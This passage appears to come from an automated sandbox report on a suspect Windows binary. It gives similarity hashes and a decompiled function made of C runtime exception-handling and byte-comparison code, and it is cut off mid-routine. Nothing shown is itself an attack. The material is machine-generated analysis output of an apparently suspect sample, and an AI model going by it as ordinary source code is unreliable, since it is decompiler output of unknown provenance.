    0x001b7b7c
    0x001b7b7f
    0x001b7b85
    0x001b7b88
    0x00000000
    0x001b7b8a
    0x001b7b8a
    0x001b7b8d
    0x001b7b8f
    0x001b7dc0
    0x001b7dc0
    0x00000000
    0x001b7b95
    0x001b7b9d
    0x001b7ba8
    0x00000000
    0x00000000
    0x001b7bb1
    0x001b7bb4
    0x001b7bb5
    0x001b7bb8
    0x001b7bba
    0x00000000
    0x001b7bc0
    0x00000000
    0x001b7bc0
    0x00000000
    0x001b7bba
    0x001b7b95
    0x001b7dc5
    0x001b7dc5
    0x001b7dc7
    0x001b7dc8
    0x001b7dcf
    0x001b7dd2
    0x001b7de0
    0x001b7de5
    0x001b7dea
    0x001b7ded
    0x001b7df2
    0x001b7df5
    0x001b7df8
    0x001b7dfa
    0x001b7dfc
    0x001b7dfc
    0x001b7e01
    0x001b7e0d
    0x001b7e13
    0x001b7e18
    0x001b7e1b
    0x001b7e1c
    0x00000000
    0x001b7e1c
    0x001b7b88
    0x001b7b66
    0x001b7b26
    0x001b7b07
    0x001b7af9
    0x001b7ac5

    APIs
    • type_info::operator==.LIBVCRUNTIME ref: 001B7BA1
    • ___TypeMatch.LIBVCRUNTIME ref: 001B7CAF
    • CatchIt.LIBVCRUNTIME ref: 001B7D00
    • _UnwindNestedFrames.LIBCMT ref: 001B7E01
    • CallUnexpected.LIBVCRUNTIME ref: 001B7E1C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4119006552-393685449
    • Opcode ID: e16ce0a44f9451b2a9cd1c9e351dca73ffb7c5330aaff0119715ebe7e9a3fadb
    • Instruction ID: 6909c35bf7faaccd922793119c9b70b0997b92dc2e0316d267fc633dbb678fb0
    • Opcode Fuzzy Hash: e16ce0a44f9451b2a9cd1c9e351dca73ffb7c5330aaff0119715ebe7e9a3fadb
    • Instruction Fuzzy Hash: 86B18A31808209AFCF29DFA4C9819EEBBB5FFA4310F15455AF8016B292D731EA51CF91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CaretFocusInvertRect$HideReleaseShow
    • String ID:
    • API String ID: 1353628544-0
    • Opcode ID: 1f0594c19982ae54dd4938fb4a9db39d78fd8a5544c50a09f2950aaf6a70b490
    • Instruction ID: 8ed437a653cb83d2b1d9f483c38cf29f2cba38760d0014c899890f397c3d6259
    • Opcode Fuzzy Hash: 1f0594c19982ae54dd4938fb4a9db39d78fd8a5544c50a09f2950aaf6a70b490
    • Instruction Fuzzy Hash: B361A278A00209DFCB04DF68C188AAEBBB1FF09311F558469E849DB361E735ED95CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CreateEvent
    • String ID:
    • API String ID: 2692171526-0
    • Opcode ID: 2d90fb6404f6431946d7c21ed0aa2f25b9f334b903b3e8ab29575a8b877283d4
    • Instruction ID: f5baa645e017a2b9fa4b534016075efab9dcd67e934ba535856feb3cb3a063d4
    • Opcode Fuzzy Hash: 2d90fb6404f6431946d7c21ed0aa2f25b9f334b903b3e8ab29575a8b877283d4
    • Instruction Fuzzy Hash: 039108B4908209DFDB04DFA8C4487AEBBF0FB49314F11852EE8659B394D7789588CF92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E001ADED0(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed char* _v0;
    				char _v5;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				void* __edi;
    				void* __esi;
    				signed int _t1005;
    				signed int _t1012;
    				intOrPtr _t1013;
    				void* _t1014;
    				signed char* _t1015;
    				intOrPtr _t1017;
    				signed int _t1020;
    				signed int _t1021;
    				signed int _t1022;
    				signed int _t1025;
    				signed int _t1028;
    				signed int _t1032;
    				signed char _t1049;
    				signed char _t1052;
    				signed char _t1053;
    				signed char _t1054;
    				signed char _t1055;
    				signed char _t1056;
    				signed int _t1245;
    				intOrPtr* _t1249;
    				intOrPtr _t1250;
    				void* _t1252;
    				signed int _t1256;
    				char _t1258;
    				signed int _t1262;
    				signed int _t1263;
    				signed int _t1270;
    				signed char* _t1336;
    				signed char* _t1337;
    				signed char* _t1338;
    				signed char* _t1339;
    				signed char* _t1340;
    				void* _t1341;
    				intOrPtr _t1342;
    				signed int _t1344;
    				intOrPtr _t1347;
    				signed char* _t1350;
    				signed char* _t1351;
    				signed char* _t1352;
    				signed char* _t1353;
    				signed char* _t1354;
    				signed int _t1355;
    				void* _t1358;
    				void* _t1359;
    				void* _t1365;
    
    				_t1333 = __edx;
    				_t1249 = _a4;
    				_push(_t1341);
    				_v5 = 0;
    				_v16 = 1;
    				 *_t1249 = E001BAEA1(__ecx,  *_t1249);
    				_t1250 = _a8;
    				_t6 = _t1250 + 0x10; // 0x11
    				_t1347 = _t6;
    				_push(_t1347);
    				_v20 = _t1347;
    				_v12 =  *(_t1250 + 8) ^  *0x1c4050;
    				E001ADE90(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0x1c4050);
    				E001B20D7(_a12);
    				_t1005 = _a4;
    				_t1359 = _t1358 + 0x10;
    				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
    				if(( *(_t1005 + 4) & 0x00000066) != 0) {
    					__eflags = _t1342 - 0xfffffffe;
    					if(_t1342 != 0xfffffffe) {
    						_t1333 = 0xfffffffe;
    						E001B20C0(_t1250, 0xfffffffe, _t1347, 0x1c4050);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t1005;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
    					if(_t1342 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t1256 = _v12;
    							_t1012 = _t1342 + (_t1342 + 2) * 2;
    							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
    							_t1013 = _t1256 + _t1012 * 4;
    							_t1257 =  *((intOrPtr*)(_t1013 + 4));
    							_v24 = _t1013;
    							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
    								_t1258 = _v5;
    								goto L7;
    							} else {
    								_t1333 = _t1347;
    								_t1014 = E001B2060(_t1257, _t1347);
    								_t1258 = 1;
    								_v5 = 1;
    								_t1365 = _t1014;
    								if(_t1365 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t1347);
    									E001ADE90(_t1250, _t1333, _t1342, _t1347, _v12);
    									goto L14;
    								} else {
    									if(_t1365 > 0) {
    										_t1015 = _a4;
    										__eflags =  *_t1015 - 0xe06d7363;
    										if( *_t1015 == 0xe06d7363) {
    											__eflags =  *0x1bc628;
    											if(__eflags != 0) {
    												_t1245 = E001B1EB0(__eflags, 0x1bc628);
    												_t1359 = _t1359 + 4;
    												__eflags = _t1245;
    												if(_t1245 != 0) {
    													_t1355 =  *0x1bc628; // 0x1adc55
    													 *0x1c7000(_a4, 1);
    													 *_t1355();
    													_t1347 = _v20;
    													_t1359 = _t1359 + 8;
    												}
    												_t1015 = _a4;
    											}
    										}
    										_t1334 = _t1015;
    										E001B20A0(_t1015, _a8, _t1015);
    										_t1017 = _a8;
    										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
    										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
    											_t1334 = _t1342;
    											E001B20C0(_t1017, _t1342, _t1347, 0x1c4050);
    											_t1017 = _a8;
    										}
    										_push(_t1347);
    										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
    										E001ADE90(_t1250, _t1334, _t1342, _t1347, _v12);
    										E001B2080();
    										asm("int3");
    										_push(_t1347);
    										_push(_t1342);
    										_t1344 = _v32;
    										_t1020 = _t1344;
    										__eflags = _t1020;
    										if(_t1020 == 0) {
    											_t1021 = 0;
    											__eflags = 0;
    										} else {
    											_t1022 = _t1020 - 1;
    											__eflags = _t1022;
    											if(_t1022 == 0) {
    												_t1262 =  *_v0 & 0x000000ff;
    												_t1025 =  *_a4 & 0x000000ff;
    												goto L511;
    											} else {
    												_t1028 = _t1022 - 1;
    												__eflags = _t1028;
    												if(_t1028 == 0) {
    													_t1336 = _v0;
    													_t1350 = _a4;
    													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
    													__eflags = _t1263;
    													if(_t1263 != 0) {
    														__eflags = _t1263;
    														_t993 = _t1263 > 0;
    														__eflags = _t993;
    														_t1263 = (0 | _t993) * 2 - 1;
    													}
    													__eflags = _t1263;
    													if(_t1263 != 0) {
    														goto L513;
    													} else {
    														_t1262 = _t1336[1] & 0x000000ff;
    														_t1025 = _t1350[1] & 0x000000ff;
    														goto L511;
    													}
    													goto L528;
    												} else {
    													_t1032 = _t1028 - 1;
    													__eflags = _t1032;
    													if(_t1032 == 0) {
    														_t1337 = _v0;
    														_t1351 = _a4;
    														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
    														__eflags = _t1263;
    														if(_t1263 != 0) {
    															__eflags = _t1263;
    															_t979 = _t1263 > 0;
    															__eflags = _t979;
    															_t1263 = (0 | _t979) * 2 - 1;
    														}
    														__eflags = _t1263;
    														if(_t1263 != 0) {
    															goto L513;
    														} else {
    															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
    															__eflags = _t1263;
    															if(_t1263 != 0) {
    																__eflags = _t1263;
    																_t985 = _t1263 > 0;
    																__eflags = _t985;
    																_t1263 = (0 | _t985) * 2 - 1;
    															}
    															__eflags = _t1263;
    															if(_t1263 != 0) {
    																goto L513;
    															} else {
    																_t1262 = _t1337[2] & 0x000000ff;
    																_t1025 = _t1351[2] & 0x000000ff;
    																goto L511;
    															}
    														}
    														goto L528;
    													} else {
    														__eflags = _t1032 == 1;
    														if(_t1032 == 1) {
    															_t1338 = _v0;
    															_t1352 = _a4;
    															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
    															__eflags = _t1263;
    															if(_t1263 != 0) {
    																__eflags = _t1263;
    																_t955 = _t1263 > 0;
    																__eflags = _t955;
    																_t1263 = (0 | _t955) * 2 - 1;
    															}
    															__eflags = _t1263;
    															if(_t1263 == 0) {
    																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
    																__eflags = _t1263;
    																if(_t1263 != 0) {
    																	__eflags = _t1263;
    																	_t961 = _t1263 > 0;
    																	__eflags = _t961;
    																	_t1263 = (0 | _t961) * 2 - 1;
    																}
    																__eflags = _t1263;
    																if(_t1263 == 0) {
    																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
    																	__eflags = _t1263;
    																	if(_t1263 != 0) {
    																		__eflags = _t1263;
    																		_t967 = _t1263 > 0;
    																		__eflags = _t967;
    																		_t1263 = (0 | _t967) * 2 - 1;
    																	}
    																	__eflags = _t1263;
    																	if(_t1263 == 0) {
    																		_t1262 = _t1338[3] & 0x000000ff;
    																		_t1025 = _t1352[3] & 0x000000ff;
    																		L511:
    																		_t1263 = _t1262 - _t1025;
    																		__eflags = _t1263;
    																		if(_t1263 != 0) {
    																			__eflags = _t1263;
    																			_t973 = _t1263 > 0;
    																			__eflags = _t973;
    																			_t1263 = (0 | _t973) * 2 - 1;
    																		}
    																	}
    																}
    															}
    															L513:
    															_t1021 = _t1263;
    														} else {
    															_t1339 = _a4;
    															_t1353 = _v0;
    															_push(_t1250);
    															_t1252 = 0x20;
    															while(1) {
    																__eflags = _t1344 - _t1252;
    																if(_t1344 < _t1252) {
    																	break;
    																}
    																_t1049 =  *_t1353;
    																__eflags = _t1049 -  *_t1339;
    																if(_t1049 ==  *_t1339) {
    																	L42:
    																	__eflags = _t1353[4] - _t1339[4];
    																	if(_t1353[4] == _t1339[4]) {
    																		L55:
    																		__eflags = _t1353[8] - _t1339[8];
    																		if(_t1353[8] == _t1339[8]) {
    																			L68:
    																			_t1052 = _t1353[0xc];
    																			__eflags = _t1052 - _t1339[0xc];
    																			if(_t1052 == _t1339[0xc]) {
    																				L81:
    																				_t1053 = _t1353[0x10];
    																				__eflags = _t1053 - _t1339[0x10];
    																				if(_t1053 == _t1339[0x10]) {
    																					L94:
    																					_t1054 = _t1353[0x14];
    																					__eflags = _t1054 - _t1339[0x14];
    																					if(_t1054 == _t1339[0x14]) {
    																						L107:
    																						_t1055 = _t1353[0x18];
    																						__eflags = _t1055 - _t1339[0x18];
    																						if(_t1055 == _t1339[0x18]) {
    																							L120:
    																							_t1056 = _t1353[0x1c];
    																							__eflags = _t1056 - _t1339[0x1c];
    																							if(_t1056 == _t1339[0x1c]) {
    																								L133:
    																								_t1353 =  &(_t1353[_t1252]);
    																								_t1339 =  &(_t1339[_t1252]);
    																								_t1344 = _t1344 - _t1252;
    																								__eflags = _t1344;
    																								continue;
    																							} else {
    																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
    																								__eflags = _t1270;
    																								if(_t1270 != 0) {
    																									__eflags = _t1270;
    																									_t228 = _t1270 > 0;
    																									__eflags = _t228;
    																									_t1270 = (0 | _t228) * 2 - 1;
    																								}
    																								__eflags = _t1270;
    																								if(_t1270 == 0) {
    																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
    																									__eflags = _t1270;
    																									if(_t1270 != 0) {
    																										__eflags = _t1270;
    																										_t234 = _t1270 > 0;
    																										__eflags = _t234;
    																										_t1270 = (0 | _t234) * 2 - 1;
    																									}
    																									__eflags = _t1270;
    																									if(_t1270 == 0) {
    																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
    																										__eflags = _t1270;
    																										if(_t1270 != 0) {
    																											__eflags = _t1270;
    																											_t240 = _t1270 > 0;
    																											__eflags = _t240;
    																											_t1270 = (0 | _t240) * 2 - 1;
    																										}
    																										__eflags = _t1270;
    																										if(_t1270 == 0) {
    																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
    																											__eflags = _t1270;
    																											if(_t1270 != 0) {
    																												__eflags = _t1270;
    																												_t246 = _t1270 > 0;
    																												__eflags = _t246;
    																												_t1270 = (0 | _t246) * 2 - 1;
    																											}
    																											__eflags = _t1270;
    																											if(_t1270 == 0) {
    																												goto L133;
    																											}
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
    																							__eflags = _t1270;
    																							if(_t1270 != 0) {
    																								__eflags = _t1270;
    																								_t203 = _t1270 > 0;
    																								__eflags = _t203;
    																								_t1270 = (0 | _t203) * 2 - 1;
    																							}
    																							__eflags = _t1270;
    																							if(_t1270 == 0) {
    																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
    																								__eflags = _t1270;
    																								if(_t1270 != 0) {
    																									__eflags = _t1270;
    																									_t209 = _t1270 > 0;
    																									__eflags = _t209;
    																									_t1270 = (0 | _t209) * 2 - 1;
    																								}
    																								__eflags = _t1270;
    																								if(_t1270 == 0) {
    																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
    																									__eflags = _t1270;
    																									if(_t1270 != 0) {
    																										__eflags = _t1270;
    																										_t215 = _t1270 > 0;
    																										__eflags = _t215;
    																										_t1270 = (0 | _t215) * 2 - 1;
    																									}
    																									__eflags = _t1270;
    																									if(_t1270 == 0) {
    																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
    																										__eflags = _t1270;
    																										if(_t1270 != 0) {
    																											__eflags = _t1270;
    																											_t221 = _t1270 > 0;
    																											__eflags = _t221;
    																											_t1270 = (0 | _t221) * 2 - 1;
    																										}
    																										__eflags = _t1270;
    																										if(_t1270 == 0) {
    																											goto L120;
    																										}
    																									}
    																								}
    																							}
    																						}
    																					} else {
    																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
    																						__eflags = _t1270;
    																						if(_t1270 != 0) {
    																							__eflags = _t1270;
    																							_t178 = _t1270 > 0;
    																							__eflags = _t178;
    																							_t1270 = (0 | _t178) * 2 - 1;
    																						}
    																						__eflags = _t1270;
    																						if(_t1270 == 0) {
    																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
    																							__eflags = _t1270;
    																							if(_t1270 != 0) {
    																								__eflags = _t1270;
    																								_t184 = _t1270 > 0;
    																								__eflags = _t184;
    																								_t1270 = (0 | _t184) * 2 - 1;
    																							}
    																							__eflags = _t1270;
    																							if(_t1270 == 0) {
    																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
    																								__eflags = _t1270;
    																								if(_t1270 != 0) {
    																									__eflags = _t1270;
    																									_t190 = _t1270 > 0;
    																									__eflags = _t190;
    																									_t1270 = (0 | _t190) * 2 - 1;
    																								}
    																								__eflags = _t1270;
    																								if(_t1270 == 0) {
    																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
    																									__eflags = _t1270;
    																									if(_t1270 != 0) {
    																										__eflags = _t1270;
    																										_t196 = _t1270 > 0;
    																										__eflags = _t196;
    																										_t1270 = (0 | _t196) * 2 - 1;
    																									}
    																									__eflags = _t1270;
    																									if(_t1270 == 0) {
    																										goto L107;
    																									}
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t153 = _t1270 > 0;
    																						__eflags = _t153;
    																						_t1270 = (0 | _t153) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
    																						__eflags = _t1270;
    																						if(_t1270 != 0) {
    																							__eflags = _t1270;
    																							_t159 = _t1270 > 0;
    																							__eflags = _t159;
    																							_t1270 = (0 | _t159) * 2 - 1;
    																						}
    																						__eflags = _t1270;
    																						if(_t1270 == 0) {
    																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
    																							__eflags = _t1270;
    																							if(_t1270 != 0) {
    																								__eflags = _t1270;
    																								_t165 = _t1270 > 0;
    																								__eflags = _t165;
    																								_t1270 = (0 | _t165) * 2 - 1;
    																							}
    																							__eflags = _t1270;
    																							if(_t1270 == 0) {
    																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
    																								__eflags = _t1270;
    																								if(_t1270 != 0) {
    																									__eflags = _t1270;
    																									_t171 = _t1270 > 0;
    																									__eflags = _t171;
    																									_t1270 = (0 | _t171) * 2 - 1;
    																								}
    																								__eflags = _t1270;
    																								if(_t1270 == 0) {
    																									goto L94;
    																								}
    																							}
    																						}
    																					}
    																				}
    																			} else {
    																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t128 = _t1270 > 0;
    																					__eflags = _t128;
    																					_t1270 = (0 | _t128) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t134 = _t1270 > 0;
    																						__eflags = _t134;
    																						_t1270 = (0 | _t134) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
    																						__eflags = _t1270;
    																						if(_t1270 != 0) {
    																							__eflags = _t1270;
    																							_t140 = _t1270 > 0;
    																							__eflags = _t140;
    																							_t1270 = (0 | _t140) * 2 - 1;
    																						}
    																						__eflags = _t1270;
    																						if(_t1270 == 0) {
    																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
    																							__eflags = _t1270;
    																							if(_t1270 != 0) {
    																								__eflags = _t1270;
    																								_t146 = _t1270 > 0;
    																								__eflags = _t146;
    																								_t1270 = (0 | _t146) * 2 - 1;
    																							}
    																							__eflags = _t1270;
    																							if(_t1270 == 0) {
    																								goto L81;
    																							}
    																						}
    																					}
    																				}
    																			}
    																		} else {
    																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t103 = _t1270 > 0;
    																				__eflags = _t103;
    																				_t1270 = (0 | _t103) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t109 = _t1270 > 0;
    																					__eflags = _t109;
    																					_t1270 = (0 | _t109) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t115 = _t1270 > 0;
    																						__eflags = _t115;
    																						_t1270 = (0 | _t115) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
    																						__eflags = _t1270;
    																						if(_t1270 != 0) {
    																							__eflags = _t1270;
    																							_t121 = _t1270 > 0;
    																							__eflags = _t121;
    																							_t1270 = (0 | _t121) * 2 - 1;
    																						}
    																						__eflags = _t1270;
    																						if(_t1270 == 0) {
    																							goto L68;
    																						}
    																					}
    																				}
    																			}
    																		}
    																	} else {
    																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t77 = _t1270 > 0;
    																			__eflags = _t77;
    																			_t1270 = (0 | _t77) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t83 = _t1270 > 0;
    																				__eflags = _t83;
    																				_t1270 = (0 | _t83) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t89 = _t1270 > 0;
    																					__eflags = _t89;
    																					_t1270 = (0 | _t89) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
    																					__eflags = _t1270;
    																					if(_t1270 != 0) {
    																						__eflags = _t1270;
    																						_t95 = _t1270 > 0;
    																						__eflags = _t95;
    																						_t1270 = (0 | _t95) * 2 - 1;
    																					}
    																					__eflags = _t1270;
    																					if(_t1270 == 0) {
    																						goto L55;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
    																	__eflags = _t1270;
    																	if(_t1270 != 0) {
    																		__eflags = _t1270;
    																		_t51 = _t1270 > 0;
    																		__eflags = _t51;
    																		_t1270 = (0 | _t51) * 2 - 1;
    																	}
    																	__eflags = _t1270;
    																	if(_t1270 == 0) {
    																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
    																		__eflags = _t1270;
    																		if(_t1270 != 0) {
    																			__eflags = _t1270;
    																			_t57 = _t1270 > 0;
    																			__eflags = _t57;
    																			_t1270 = (0 | _t57) * 2 - 1;
    																		}
    																		__eflags = _t1270;
    																		if(_t1270 == 0) {
    																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
    																			__eflags = _t1270;
    																			if(_t1270 != 0) {
    																				__eflags = _t1270;
    																				_t63 = _t1270 > 0;
    																				__eflags = _t63;
    																				_t1270 = (0 | _t63) * 2 - 1;
    																			}
    																			__eflags = _t1270;
    																			if(_t1270 == 0) {
    																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
    																				__eflags = _t1270;
    																				if(_t1270 != 0) {
    																					__eflags = _t1270;
    																					_t69 = _t1270 > 0;
    																					__eflags = _t69;
    																					_t1270 = (0 | _t69) * 2 - 1;
    																				}
    																				__eflags = _t1270;
    																				if(_t1270 == 0) {
    																					goto L42;
    																				}
    																			}
    																		}
    																	}
    																}
    																L228:
    																_t1021 = _t1270;
    																goto L527;
    															}
    															_t1354 =  &(_t1353[_t1344]);
    															_t1340 =  &(_t1339[_t1344]);
    															switch( *((intOrPtr*)(_t1344 * 4 +  &M001AF62A))) {
    																case 0:
    																	L227:
    																	_t1270 = 0;
    																	__eflags = 0;
    																	goto L228;
    																case 1:
    																	L320:
    																	__eax =  *(__edx - 1) & 0x000000ff;
    																	__ecx =  *(__esi - 1) & 0x000000ff;
    																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
    																	__eflags = __ecx;
    																	if(__ecx != 0) {
    																		__eax = 0;
    																		__eflags = __ecx;
    																		__eax = 0 | __ecx > 0x00000000;
    																		__ecx = (__ecx > 0) * 2 - 1;
    																	}
    																	goto L228;
    																case 2:
    																	L413:
    																	__eflags =  *(__esi - 2) -  *(__edx - 2);
    																	if( *(__esi - 2) ==  *(__edx - 2)) {
    																		goto L227;
    																	} else {
    																		goto L317;
    																	}
    																	goto L528;
    																case 3:
    																	L314:
    																	__eax =  *(__edx - 3) & 0x000000ff;
    																	__ecx =  *(__esi - 3) & 0x000000ff;
    																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
    																	__eflags = __ecx;
    																	if(__ecx != 0) {
    																		__eax = 0;
    																		__eflags = __ecx;
    																		_t594 = __ecx > 0;
    																		__eflags = _t594;
    																		__eax = 0 | _t594;
    																		__ecx = _t594 * 2 - 1;
    																	}
    																	__eflags = __ecx;
    																	if(__ecx != 0) {
    																		goto L228;
    																	} else {
    																		L317:
    																		__eax =  *(__edx - 2) & 0x000000ff;
    																		__ecx =  *(__esi - 2) & 0x000000ff;
    																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			__eax = 0;
    																			__eflags = __ecx;
    																			_t600 = __ecx > 0;
    																			__eflags = _t600;
    																			__eax = 0 | _t600;
    																			__ecx = _t600 * 2 - 1;
    																		}
    																		__eflags = __ecx;
    																		if(__ecx != 0) {
    																			goto L228;
    																		} else {
    																			goto L320;
    																		}
    																	}
    																	goto L528;
    																case 4:
    																	L214:
    																	_t1063 =  *(_t1354 - 4);
    																	__eflags = _t1063 -  *(_t1340 - 4);
    																	if(_t1063 ==  *(_t1340 - 4)) {
    																		goto L227;
    																	} else {
    																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
